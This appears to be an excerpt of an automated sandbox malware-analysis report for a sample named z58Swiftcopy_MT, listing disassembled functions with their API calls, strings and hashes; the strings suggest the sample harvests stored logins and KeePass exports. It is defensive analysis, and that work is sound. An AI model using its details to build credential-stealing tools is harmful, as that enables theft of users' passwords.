                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                                      • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                                      Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                                      Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                                      • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                                      Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                                      • API String ID: 3330709923-517860148
                                                                                                                                                                                                                                      • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                                      Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                                      • String ID: logins$null
                                                                                                                                                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                                      • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                                      Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                      • String ID: ---
                                                                                                                                                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                                      Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1010922700-0
                                                                                                                                                                                                                                      • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                                      Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                                      • String ID: |A
                                                                                                                                                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                                      • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                                      Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                                      • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                                      Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                      • API String ID: 2012295524-70141382
                                                                                                                                                                                                                                      • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
